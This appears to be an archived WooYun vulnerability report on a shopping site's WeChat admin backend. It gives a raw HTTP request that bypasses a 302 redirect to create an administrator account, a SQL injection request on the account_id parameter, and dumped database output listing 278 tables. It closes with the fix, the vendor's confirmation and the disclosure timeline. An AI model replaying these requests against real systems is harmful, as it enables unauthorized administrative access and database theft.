乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-13: 细节已通知厂商并且等待厂商处理中 2015-05-13: 厂商已经确认,细节仅向厂商公开 2015-05-23: 细节向核心白帽子及相关领域专家公开 2015-06-02: 细节向普通白帽子公开 2015-06-12: 细节向实习白帽子公开 2015-06-27: 细节向公众公开
优购物某后台未授权访问和MySQL注射
漏洞1,302绕过302跳转未exit,扔输出了页面内容,可以直接访问后台,把返回的302改成200即可。
示例添加个wooyun,密码wooyun的账号,顺利进入后台:
POST http://weixin.17ugo.com/index.php/system/account_saveaccount.php HTTP/1.1Host: weixin.17ugo.comProxy-Connection: keep-aliveContent-Length: 129Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://weixin.17ugo.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://weixin.17ugo.com/index.php/system/account_newaccount.phpAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6Cookie: tanchu=1; __ozlvd1687=1431490775; _ga=GA1.2.176173063.1431489248; Hm_lvt_7b74f5f61e55127b3a8e6c0f8a2eed17=1431489248; Hm_lpvt_7b74f5f61e55127b3a8e6c0f8a2eed17=1431490776; NTKF_T2D_CLIENTID=guestA0E8E9FA-3ADA-86A7-38B7-4B68833B15F2; nTalk_CACHE_DATA={uid:kf_9715_ISME9754_guestA0E8E9FA-3ADA-86,tid:1431489248352962,onlyone:1}; __utma=232567135.176173063.1431489248.1431489249.1431489249.1; __utmb=232567135.2.10.1431489249; __utmc=232567135; __utmz=232567135.1431489249.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); nTalk_PAGE_MANAGE={|m|:[],|t|:|12:25:21|}; ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2262ec6d7076c52987ddf0fd109027df21%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.1.1.22%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A109%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F42.0.2311.135+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1431491396%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22authcode%22%3Bs%3A4%3A%225981%22%3B%7D464c98229bae00440f0a77172e4e82e2account_id=&account_name=wooyun&account_role=1&account_new_passwd_1=wooyun&account_new_passwd_2=wooyun&account_description=wooyun
注射点多个,参数均为account_id:
POST /index.php/system/account_saveaccount.php HTTP/1.1Content-Length: 447Content-Type: application/x-www-form-urlencodedCookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%227a321192c2030a4d159f93fe87de5c56%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.1.1.22%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28iPhone%3B+CPU+iPhone+OS+8_0+like+Mac+OS+X%29+AppleWebKit%2F600.1.3+%28KHTML%2C+like+Gecko%29+Version%2F8.0+Mobile%2F12A4345%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1431453432%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22authcode%22%3Bs%3A4%3A%225276%22%3B%7D75360e9880cbd02fb9d5db92f4114d41Host: weixin.17ugo.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4Accept: */*account_description=111111&account_id=*&account_name=test&account_new_passwd_1=test&account_new_passwd_2=test&account_role=-
current user: '[email protected]'Database: wx2[278 tables]+------------------------------------+| app_coupon_desc || wx_account || wx_account_assigned_message || wx_account_reply_message || wx_account_reply_message_00 || wx_account_reply_message_01 || wx_account_reply_message_02 || wx_account_reply_message_03 || wx_account_reply_message_04 || wx_account_reply_message_05 || wx_account_reply_message_06 || wx_account_reply_message_07 || wx_account_reply_message_08 || wx_account_reply_message_09 || wx_account_reply_message_10 || wx_account_reply_message_11 || wx_account_reply_message_12 || wx_account_reply_message_13 || wx_account_reply_message_14 || wx_account_reply_message_15 || wx_account_reply_message_16 || wx_account_reply_message_17 || wx_account_reply_message_18 || wx_account_reply_message_19 || wx_account_reply_message_20 || wx_account_reply_message_21 || wx_account_reply_message_22 || wx_account_reply_message_23 || wx_account_reply_message_24 || wx_account_reply_message_25 || wx_account_reply_message_26 || wx_account_reply_message_27 || wx_account_reply_message_28 || wx_account_reply_message_29 || wx_account_reply_message_30 || wx_account_reply_message_31 || wx_account_reply_message_32 || wx_account_reply_message_33 || wx_account_reply_message_34 || wx_account_reply_message_35 || wx_account_reply_message_36 || wx_account_reply_message_37 || wx_account_reply_message_38 || wx_account_reply_message_39 || wx_account_reply_message_40 || wx_account_reply_message_41 || wx_account_reply_message_42 || wx_account_reply_message_43 || wx_account_reply_message_44 || wx_account_reply_message_45 || wx_account_reply_message_46 || wx_account_reply_message_47 || wx_account_reply_message_48 || wx_account_reply_message_49 || wx_account_reply_message_50 || wx_account_reply_message_51 || wx_account_reply_message_52 || wx_account_reply_message_53 || wx_account_reply_message_54 || wx_account_reply_message_55 || wx_account_reply_message_56 || wx_account_reply_message_57 || wx_account_reply_message_58 || wx_account_reply_message_59 || wx_account_reply_message_60 || wx_account_reply_message_61 || wx_account_reply_message_62 || wx_account_reply_message_63 || wx_account_reply_message_64 || wx_account_reply_message_65 || wx_account_reply_message_66 || wx_account_reply_message_67 || wx_account_reply_message_68 || wx_account_reply_message_69 || wx_account_reply_message_70 || wx_account_reply_message_71 || wx_account_reply_message_72 || wx_account_reply_message_73 || wx_account_reply_message_74 || wx_account_reply_message_75 || wx_account_reply_message_76 || wx_account_reply_message_77 || wx_account_reply_message_78 || wx_account_reply_message_79 || wx_account_reply_message_80 || wx_account_reply_message_81 || wx_account_reply_message_82 || wx_account_reply_message_83 || wx_account_reply_message_84 || wx_account_reply_message_85 || wx_account_reply_message_86 || wx_account_reply_message_87 || wx_account_reply_message_88 || wx_account_reply_message_89 || wx_account_reply_message_90 || wx_account_reply_message_91 || wx_account_reply_message_92 || wx_account_reply_message_93 || wx_account_reply_message_94 || wx_account_reply_message_95 || wx_account_reply_message_96 || wx_account_reply_message_97 || wx_account_reply_message_98 || wx_account_reply_message_99 || wx_add_auto_reply_message || wx_app_download || wx_assemble_auto_reply_message || wx_auto_reply_message || wx_banner || wx_brand_day || wx_column || wx_column_list || wx_dialog_message || wx_dialog_user || wx_district || wx_examine || wx_goods || wx_group || wx_group_message || wx_important_user || wx_jfgz || wx_keyword || wx_keyword_auto_reply_message || wx_keyword_reply_rule || wx_materials || wx_menu || wx_menu_message || wx_menu_publish_time || wx_message || wx_message_00 || wx_message_01 || wx_message_02 || wx_message_03 || wx_message_04 || wx_message_05 || wx_message_06 || wx_message_07 || wx_message_08 || wx_message_09 || wx_message_10 || wx_message_11 || wx_message_12 || wx_message_13 || wx_message_14 || wx_message_15 || wx_message_16 || wx_message_17 || wx_message_18 || wx_message_19 || wx_message_20 || wx_message_21 || wx_message_22 || wx_message_23 || wx_message_24 || wx_message_25 || wx_message_26 || wx_message_27 || wx_message_28 || wx_message_29 || wx_message_30 || wx_message_31 || wx_message_32 || wx_message_33 || wx_message_34 || wx_message_35 || wx_message_36 || wx_message_37 || wx_message_38 || wx_message_39 || wx_message_40 || wx_message_41 || wx_message_42 || wx_message_43 || wx_message_44 || wx_message_45 || wx_message_46 || wx_message_47 || wx_message_48 || wx_message_49 || wx_message_50 || wx_message_51 || wx_message_52 || wx_message_53 || wx_message_54 || wx_message_55 || wx_message_56 || wx_message_57 || wx_message_58 || wx_message_59 || wx_message_60 || wx_message_61 || wx_message_62 || wx_message_63 || wx_message_64 || wx_message_65 || wx_message_66 || wx_message_67 || wx_message_68 || wx_message_69 || wx_message_70 || wx_message_71 || wx_message_72 || wx_message_73 || wx_message_74 || wx_message_75 || wx_message_76 || wx_message_77 || wx_message_78 || wx_message_79 || wx_message_80 || wx_message_81 || wx_message_82 || wx_message_83 || wx_message_84 || wx_message_85 || wx_message_86 || wx_message_87 || wx_message_88 || wx_message_89 || wx_message_90 || wx_message_91 || wx_message_92 || wx_message_93 || wx_message_94 || wx_message_95 || wx_message_96 || wx_message_97 || wx_message_98 || wx_message_99 || wx_message_contrast || wx_message_count || wx_message_id || wx_message_tag || wx_message_tag_relation || wx_message_time || wx_message_total_statistics || wx_message_type || wx_mixed_materials || wx_node || wx_node_copy || wx_node_copy_bak || wx_notice || wx_notice_rule || wx_notice_time_copy || wx_online_customer || wx_openid_accountid || wx_operation_log || wx_operation_type || wx_role || wx_sale_time || wx_send_moon || wx_send_msgid || wx_statistics_important_user || wx_statistics_keyword_reply_msg || wx_statistics_new_subscirbe_msg || wx_statistics_new_subscribe_user || wx_statistics_notkeyword_reply_msg || wx_statistics_total_account || wx_statistics_total_msg || wx_statistics_total_user || wx_statistics_unsubscribe_user || wx_subscribe_reply_message || wx_tag || wx_today_half || wx_today_live || wx_tvdialog_message || wx_tvdialog_user || wx_unmatch_user_reply_message || wx_user || wx_user_bind || wx_user_contrast || wx_user_tag || wx_user_total_statistics || wx_week_broad || wx_weekbroad || wx_welcomemsg || wx_wxaccount || wx_zxkf |+------------------------------------+
输出302后exit参数过滤,解决SQL注射
危害等级:高
漏洞Rank:18
确认时间:2015-05-13 14:35
感谢您的关注,漏洞正在修复。
暂无